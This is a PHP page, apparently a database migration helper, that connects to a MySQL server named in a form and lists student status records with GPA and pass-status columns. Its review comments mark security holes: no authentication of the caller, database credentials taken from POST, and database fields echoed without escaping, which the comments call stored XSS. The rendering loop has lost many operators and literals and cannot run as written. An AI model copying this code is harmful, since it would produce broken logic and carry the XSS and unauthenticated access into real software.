<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
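<?php
    // mof_ssm.php: migration helper. Connects to the MySQL server named in the
    // submitted form, selects the "reg" schema and (further down this file)
    // lists StudentStatus rows.
    //
    // Every input below comes from $_POST and is untrusted: the form supplies
    // the DB host, user and password as well as the schema names. Nothing here
    // authenticates the caller, so this page must only be reachable by trusted
    // operators (web-server ACL or an application login in front of it).
    //
    // Side effects: opens $ln_reg (mysql link reused by the query below),
    // echoes a status line, dies on failure. The mysql_* extension is kept
    // because the rest of the file depends on $ln_reg being a mysql link; it
    // was removed in PHP 7, so a port to mysqli/PDO has to be done file-wide.
    //
    // The commented-out debug echoes that printed $tUsername / $tPassword to
    // the page were removed from this block; do not reintroduce them.

    // Missing keys become '' instead of raising an undefined-index notice.
    $dbreg     = isset($_POST["dbreg"])       ? $_POST["dbreg"]       : '';
    $dbmoreg   = isset($_POST["dbmoreg"])     ? $_POST["dbmoreg"]     : '';
    $dbppc     = isset($_POST["dbppc"])       ? $_POST["dbppc"]       : '';   // read, not used on this page
    $oums      = isset($_POST["oums"])        ? $_POST["oums"]        : '';   // read, not used on this page
    $nums      = isset($_POST["nums"])        ? $_POST["nums"]        : '';   // read, not used on this page
    $host      = isset($_POST["localhost_s"]) ? $_POST["localhost_s"] : '';
    $tUsername = isset($_POST["localhost_u"]) ? $_POST["localhost_u"] : '';
    $tPassword = isset($_POST["localhost_p"]) ? $_POST["localhost_p"] : '';
    $dbNo      = isset($_POST["dbNo"])        ? $_POST["dbNo"]        : '';   // read, not used on this page

    // $dbreg is spliced into a query as a schema name later in this file
    // (where it cannot be bound as a parameter) and is echoed back into HTML.
    // Restrict it to identifier characters before it reaches either place.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $dbreg)) {
        die('invalid database name');
    }
    $dbreg_html = htmlspecialchars($dbreg, ENT_QUOTES, 'UTF-8');

    $ln_reg = mysql_connect($host, $tUsername, $tPassword, true);
    if (!$ln_reg) {
        // Keep the driver error in the server log; echoing mysql_error() to the
        // browser leaks host/user details to whoever submits the form.
        error_log('mof_ssm: mysql_connect failed: ' . mysql_error());
        die("<font color='#FF0000'> ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง</font>");
    }

    $db_info = mysql_select_db($dbreg, $ln_reg);
    //mysql_query("SET NAMES 'utf8'", $ln_info);
    if (!$db_info) {
        error_log('mof_ssm: mysql_select_db(' . $dbreg . ') failed: ' . mysql_error());
        // The original message named $dbmoreg here although $dbreg is the
        // schema that was actually selected.
        die('ไม่สามารถเชื่อมต่อฐานข้อมูล' . $dbreg_html . 'ได้');
    }
    echo " เชื่อมต่อฐานข้อมูล $dbreg_html สำเร็จ<br>";

    echo "<br><br>";
?>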

<table border="1" class='tb_1'>

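<?php
    // Load every StudentStatus row from the selected schema, ordered by
    // student, academic year and semester, for the table that follows.
    // Requires $ln_reg (mysql link) and $dbreg (schema name) set earlier in
    // this file; sets $result and $num_rows for the rendering loop below.
    //
    // Derived columns:
    //   approveDate  re-emitted with YEAR()-543 (Buddhist Era -> Gregorian)
    //   sy           1 + number of this student's earlier (acadYear, semester)
    //                rows whose passStatus is 1, 2 or 3 (correlated subquery)
    //
    // $dbreg is a schema identifier, not a value, so it cannot be bound as a
    // query parameter. It is whitelisted to identifier characters and
    // backtick-quoted instead; anything else would be spliced verbatim into
    // the statement.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $dbreg)) {
        die('invalid database name');
    }
    $schema = '`' . $dbreg . '`';

//$query = "SELECT * FROM $dbmoreg.rg_StudentSummary WHERE 1 ORDER BY ssmStdId,ssmAcY,ssmTmId";
//SELECT studentId, count( passStatus ) passStatus FROM reg.StudentStatus WHERE passStatus IN (1,2,3) GROUP BY studentId HAVING count( passStatus ) >3
//    $query = "SELECT * FROM $dbreg.StudentStatus WHERE 1 ORDER BY studentId,acadYear,semester";
    $query = "SELECT 
studentId
,acadYear
,semester
,studentStatus
,GPA
,creditAttempt
,creditSatisfy
,creditPoint
,GPAX
,sumCreditAttempt
,sumCreditSatisfy
,sumCreditPoint
,createDateTime
,createUserId
,updateDateTime
,updateUserId
,approveSpe
,approver
,refNo
,CONCAT(YEAR(approveDate)-543,'-',MONTH(approveDate),'-',DAY(approveDate)) AS approveDate
,passStatus
, (
    SELECT count( studentId ) +1 AS npass
    FROM {$schema}.`StudentStatus` ss2
    WHERE ss.studentId = ss2.studentId
        AND (
            ss2.acadYear < ss.acadYear
        OR (
            ss2.acadYear = ss.acadYear
        AND ss2.semester < ss.semester
            )
        )
        AND ss2.passStatus
        IN ( 1, 2, 3 )
    ) AS sy
FROM {$schema}.`StudentStatus` ss
WHERE 1 =1
ORDER BY studentId,acadYear,semester
";

    $result = mysql_query($query, $ln_reg);
    if (!$result) {
        // Without this check mysql_num_rows(false) warns and the page renders
        // an empty table. Keep the driver error server-side.
        error_log('mof_ssm: StudentStatus query failed: ' . mysql_error());
        die('query failed');
    }
    $num_rows = mysql_num_rows($result);
?>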
<tr><th colspan="9" align="right">StudentStatus &nbsp; ข้อมูล&nbsp;<?php echo $num_rows?>&nbsp;แถว</th></tr>
<tr>
    <th>ลำดับ</th>
    <th>รหัสนักศึกษา<br>studentId</th>
    <th>ปีการศึกษา<br>acadYear</th>
    <th>ภาคการศึกษา<br>semester</th>
    <th>สถานะนักศึกษา<br>studentStatus</th>
    <th>ประมวลผล<br>passStatus</th>
    <th>ชั้นปี<br>sy</th>
    <th>-<br>GPAX</th>
    <th>-<br>PassStatus</th>
</tr>
<?php
    // Emit one <tr> per row of $result (set by the query above), numbered with
    // $index from 1. $tr_class alternates between two background colours and
    // is meant to flip once per student.
    //
    // NOTE(review): this copy of the file has lost several operators and
    // numeric literals (the `=` of the assignments below, the comparison
    // operators and thresholds in the status conditions, the comma in the
    // mysql_data_seek calls). Comments describe only what is visible; the
    // original constants must be confirmed against the deployed file.
    $index 
=1;
    
$stdId =0;
    
$tr_class '#e5e5e5';
    while (
$cur_row mysql_fetch_object($result)) {
        // NOTE(review): the SELECT above returns `studentId`, not `ssmStdId`
        // (that name comes from the old rg_StudentSummary query), so
        // $cur_row->ssmStdId is undefined on every row, this test is always
        // true and the colour flips on every row instead of per student.
        // Comparing $cur_row->studentId is presumably what was intended.
        if(
$stdId != $cur_row->ssmStdId){
            if(
$tr_class=='#e5e5e5')
                
$tr_class '#d3dce3';
            else
                
$tr_class '#e5e5e5';
            
$stdId $cur_row->ssmStdId;
        }
        
        // Inline style applied to every <td> of this row. The cells below echo
        // studentId, acadYear, semester, studentStatus, passStatus, sy and GPAX
        // straight from the database without htmlspecialchars(); any markup
        // stored in those columns is rendered as HTML (stored XSS).
$style "style='background-color: $tr_class ;'";
?>
    <tr >
        <td <?php echo $style?>><?php echo $index?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentId?></td>
        <td <?php echo $style?>><?php echo $cur_row->acadYear?></td>
        <td <?php echo $style?>><?php echo $cur_row->semester?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentStatus?></td>
        <td <?php echo $style?>><?php echo $cur_row->passStatus?></td>
        <td <?php echo $style?>><?php echo $cur_row->sy?></td>
        <td <?php echo $style?>><?php echo $cur_row->GPAX?></td>
<?php
        
        // Last column: a hint derived from the row that follows the current
        // one. The guard reads `$index+$num_rows` in this copy; the intent is
        // presumably "is there a row after this one" (a comparison against
        // $num_rows) -- confirm against the source.
if($index+$num_rows){
        // $index is 1-based while mysql_data_seek() rows are 0-based, so
        // seeking to $index lands on the row after the current one.
        if (
mysql_data_seek($result$index)) { // is there a next row?
            
$next mysql_fetch_object($result);
            // Only rows of the same student are compared; the operator
            // between the two acadYear values is missing from this copy.
            if(
$next->studentId == $cur_row->studentId && $next->acadYear $cur_row->acadYear){
                // The status/GPAX thresholds of these branches are missing
                // from this copy; only `4` and `1.95` survived. The first
                // branch prints the literal text 1|2|3.
                if(
$cur_row->studentStatus == && $cur_row->passStatus ){
?>
        <td <?php echo $style?>><?php echo '1|2|3'?></td>
<?php
                
}elseif($cur_row->studentStatus ==&& $cur_row->passStatus >= && $cur_row->GPAX 1.95){ 
                    echo 
"<td $style>$cur_row->passStatus</td>";
                }elseif(
$cur_row->studentStatus !=&& $cur_row->passStatus 4){ 
                    echo 
"<td $style>0</td>";
                }elseif(
$cur_row->studentStatus !=&& $cur_row->passStatus >= && $cur_row->GPAX 1.95){ 
                    echo 
"<td $style>$cur_row->passStatus</td>";
                }else{
                    echo 
"<td $style></td>";
                }

            // Next row belongs to another student / year: empty cell.
            }else{ echo 
'<td></td>';}
            
mysql_data_seek($result$index); // after the look-ahead fetch, reset the cursor so the outer fetch resumes at the same row 
        
}
        }
/*
        if($index==2){
            if (mysql_data_seek($result, $index)) {

                $next = mysql_fetch_object($result);
                    echo '- '.$index;
                    echo '&nbsp; , &nbsp;'.$next->ssmStdId.'';
                    echo '&nbsp; , &nbsp;'.$next->ssmAcY;
                    echo '&nbsp; , &nbsp;'.$next->ssmTmId.'<br>';
                mysql_data_seek($result, $index);
            }else{
                echo 'end loop';
            }
        }
        */
        
$index++;
?>    
        </tr>
<?php

    
}
    // Release the result set once every row has been rendered.
    
mysql_free_result($result);
?>
</table >
